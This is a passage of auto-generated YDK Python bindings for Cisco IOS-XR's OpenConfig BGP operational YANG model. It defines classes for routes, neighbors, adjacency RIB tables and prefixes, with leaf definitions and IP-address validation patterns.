            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastModifiedDate, self).__init__()

        self.yang_name = "last-modified-date"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        # No child containers under this node.
        self._child_classes = OrderedDict([])
        # Leaf attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        self._segment_path = lambda: "last-modified-date"
        self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/%s" % self._segment_path()
        # Freeze the entity: further writes are checked by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Only 'time_value' may be assigned after construction.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastModifiedDate, ['time_value'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
    """
    LastUpdateRecieved

    .. attribute:: time_value

        TimeValue

        **type**\: str

        **config**\: False

    """

    # NOTE: the misspelling "Recieved" comes from the YANG model and must be
    # preserved — the class name and segment path are part of the public API.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # super() call spelled both ways for Python 2 / Python 3 compatibility.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastUpdateRecieved, self).__init__()

        self.yang_name = "last-update-recieved"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        # No child containers under this node.
        self._child_classes = OrderedDict([])
        # Leaf attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        self._segment_path = lambda: "last-update-recieved"
        self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/routes/route/%s" % self._segment_path()
        # Freeze the entity: further writes are checked by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Only 'time_value' may be assigned after construction.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-model entry for the Route list entry."""
    # Imported lazily so the (large) _meta package is only loaded on demand.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-model entry for the Routes container."""
    # Imported lazily so the (large) _meta package is only loaded on demand.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes']
    return entry['meta_info']
class NumRoutes(_Entity_):
    """
    Number of routes in adjacency rib out\-bound
    post\-policy table

    .. attribute:: num_routes

        NumRoutes

        **type**\: int

        **range:** 0..18446744073709551615

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # super() call spelled both ways for Python 2 / Python 3 compatibility.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.NumRoutes, self).__init__()

        self.yang_name = "num-routes"
        self.yang_parent_name = "loc-rib"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        # No child containers under this node.
        self._child_classes = OrderedDict([])
        # Leaf attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
        ])
        self.num_routes = None
        self._segment_path = lambda: "num-routes"
        self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/%s" % self._segment_path()
        # Freeze the entity: further writes are checked by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Only 'num_routes' may be assigned after construction.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.NumRoutes, ['num_routes'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-model entry for the LocRib container."""
    # Imported lazily so the (large) _meta package is only loaded on demand.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib']
    return entry['meta_info']
class OpenConfigNeighbors(_Entity_):
"""
Neighbor list
.. attribute:: open_config_neighbor
Neighbor name
**type**\: list of :py:class:`OpenConfigNeighbor <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # super() call spelled both ways for Python 2 / Python 3 compatibility.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors, self).__init__()

    self.yang_name = "open-config-neighbors"
    self.yang_parent_name = "ipv4-unicast"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    # Single child: the keyed open-config-neighbor list.
    self._child_classes = OrderedDict([("open-config-neighbor", ("open_config_neighbor", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor))])
    # This container has no leaves of its own.
    self._leafs = OrderedDict()
    self.open_config_neighbor = YList(self)
    self._segment_path = lambda: "open-config-neighbors"
    self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/%s" % self._segment_path()
    # Freeze the entity: further writes are checked by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    # No writable leaves on this container (empty leaf-name list); all
    # writes are validated by YDK's _perform_setattr hook.
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors, [], name, value)
class OpenConfigNeighbor(_Entity_):
"""
Neighbor name
.. attribute:: neighbor_address (key)
Neighbor Address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: adj_rib_in_post
Adjacency rib in\-bound post\-policy table
**type**\: :py:class:`AdjRibInPost <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost>`
**config**\: False
.. attribute:: adj_rib_out_post
Adjacency rib out\-bound post\-policy table
**type**\: :py:class:`AdjRibOutPost <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost>`
**config**\: False
.. attribute:: adj_rib_out_pre
Adjacency rib out\-bound pre\-policy table
**type**\: :py:class:`AdjRibOutPre <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre>`
**config**\: False
.. attribute:: adj_rib_in_pre
Adjacency rib in\-bound pre\-policy table
**type**\: :py:class:`AdjRibInPre <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # super() call spelled both ways for Python 2 / Python 3 compatibility.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor, self).__init__()

    self.yang_name = "open-config-neighbor"
    self.yang_parent_name = "open-config-neighbors"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    # This is a keyed YANG list entry; 'neighbor_address' is the list key.
    self.ylist_key_names = ['neighbor_address']
    # YANG child name -> (python attribute name, binding class) for the four RIB tables.
    self._child_classes = OrderedDict([("adj-rib-in-post", ("adj_rib_in_post", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost)), ("adj-rib-out-post", ("adj_rib_out_post", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost)), ("adj-rib-out-pre", ("adj_rib_out_pre", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre)), ("adj-rib-in-pre", ("adj_rib_in_pre", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre))])
    # Leaf name -> (YLeaf descriptor, accepted types); two 'str' entries
    # because the YANG type is a union of IPv4 and IPv6 address patterns.
    self._leafs = OrderedDict([
        ('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
    ])
    self.neighbor_address = None

    self.adj_rib_in_post = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost()
    self.adj_rib_in_post.parent = self
    self._children_name_map["adj_rib_in_post"] = "adj-rib-in-post"

    self.adj_rib_out_post = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost()
    self.adj_rib_out_post.parent = self
    self._children_name_map["adj_rib_out_post"] = "adj-rib-out-post"

    self.adj_rib_out_pre = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre()
    self.adj_rib_out_pre.parent = self
    self._children_name_map["adj_rib_out_pre"] = "adj-rib-out-pre"

    self.adj_rib_in_pre = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre()
    self.adj_rib_in_pre.parent = self
    self._children_name_map["adj_rib_in_pre"] = "adj-rib-in-pre"

    # The segment path embeds the list key value at access time.
    self._segment_path = lambda: "open-config-neighbor" + "[neighbor-address='" + str(self.neighbor_address) + "']"
    self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/open-config-neighbors/%s" % self._segment_path()
    # Freeze the entity: further writes are checked by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Only the list key 'neighbor_address' is a writable leaf; all writes
    # are validated by YDK's _perform_setattr hook.
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor, ['neighbor_address'], name, value)
class AdjRibInPost(_Entity_):
"""
Adjacency rib in\-bound post\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # super() call spelled both ways for Python 2 / Python 3 compatibility.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost, self).__init__()

    self.yang_name = "adj-rib-in-post"
    self.yang_parent_name = "open-config-neighbor"
    self.is_top_level_class = False
    # An ancestor (open-config-neighbor) is a keyed list, so no static
    # absolute path is generated for this node.
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # YANG child name -> (python attribute name, binding class).
    self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes))])
    # This container has no leaves of its own.
    self._leafs = OrderedDict()

    self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes()
    self.routes.parent = self
    self._children_name_map["routes"] = "routes"

    self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes()
    self.num_routes.parent = self
    self._children_name_map["num_routes"] = "num-routes"

    self._segment_path = lambda: "adj-rib-in-post"
    # Freeze the entity: further writes are checked by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    # No writable leaves on this container (empty leaf-name list); all
    # writes are validated by YDK's _perform_setattr hook.
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # super() call spelled both ways for Python 2 / Python 3 compatibility.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes, self).__init__()

    self.yang_name = "routes"
    self.yang_parent_name = "adj-rib-in-post"
    self.is_top_level_class = False
    # An ancestor (open-config-neighbor) is a keyed list.
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Single child: the route list entries.
    self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route))])
    # This container has no leaves of its own.
    self._leafs = OrderedDict()
    self.route = YList(self)
    self._segment_path = lambda: "routes"
    # Freeze the entity: further writes are checked by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    # No writable leaves on this container (empty leaf-name list); all
    # writes are validated by YDK's _perform_setattr hook.
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # super() call spelled both ways for Python 2 / Python 3 compatibility.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route, self).__init__()

    self.yang_name = "route"
    self.yang_parent_name = "routes"
    self.is_top_level_class = False
    # An ancestor (open-config-neighbor) is a keyed list.
    self.has_list_ancestor = True
    # Unkeyed list entry: no key leaf names.
    self.ylist_key_names = []
    # YANG child name -> (python attribute name, binding class).
    self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved))])
    # Leaf name -> (YLeaf descriptor, accepted types). 'route' and
    # 'neighbor_address' list 'str' twice because their YANG types are
    # unions of IPv4 and IPv6 patterns; 'invalid_reason' is an enumeration
    # resolved against BgpOcInvalidRouteReason in this module.
    self._leafs = OrderedDict([
        ('route', (YLeaf(YType.str, 'route'), ['str','str'])),
        ('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
        ('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
        ('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
        ('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
        ('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
    ])
    self.route = None
    self.neighbor_address = None
    self.path_id = None
    self.valid_route = None
    self.invalid_reason = None
    self.best_path = None

    self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName()
    self.prefix_name.parent = self
    self._children_name_map["prefix_name"] = "prefix-name"

    self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList()
    self.route_attr_list.parent = self
    self._children_name_map["route_attr_list"] = "route-attr-list"

    self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList()
    self.ext_attributes_list.parent = self
    self._children_name_map["ext_attributes_list"] = "ext-attributes-list"

    self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate()
    self.last_modified_date.parent = self
    self._children_name_map["last_modified_date"] = "last-modified-date"

    self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved()
    self.last_update_recieved.parent = self
    self._children_name_map["last_update_recieved"] = "last-update-recieved"

    self._segment_path = lambda: "route"
    # Freeze the entity: further writes are checked by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Only the listed leaf names may be assigned after construction; all
    # writes are validated by YDK's _perform_setattr hook.
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
    """
    Prefix

    .. attribute:: prefix

        Prefix

        **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix>`

        **config**\: False

    .. attribute:: prefix_length

        Prefix length

        **type**\: int

        **range:** 0..255

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # super() call spelled both ways for Python 2 / Python 3 compatibility.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName, self).__init__()

        self.yang_name = "prefix-name"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        # An ancestor (open-config-neighbor) is a keyed list.
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Single child: the prefix address container.
        self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix))])
        # Leaf attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
        ])
        self.prefix_length = None

        self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix()
        self.prefix.parent = self
        self._children_name_map["prefix"] = "prefix"

        self._segment_path = lambda: "prefix-name"
        # Freeze the entity: further writes are checked by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Only 'prefix_length' may be assigned after construction.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName, ['prefix_length'], name, value)

    class Prefix(_Entity_):
        """
        Prefix

        .. attribute:: afi

            AFI

            **type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`

            **config**\: False

        .. attribute:: ipv4_address

            IPv4 Addr

            **type**\: str

            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: ipv6_address

            IPv6 Addr

            **type**\: str

            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False

        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            # super() call spelled both ways for Python 2 / Python 3 compatibility.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix, self).__init__()

            self.yang_name = "prefix"
            self.yang_parent_name = "prefix-name"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            # 'afi' is an enumeration resolved against BgpOcAfi in this module.
            self._leafs = OrderedDict([
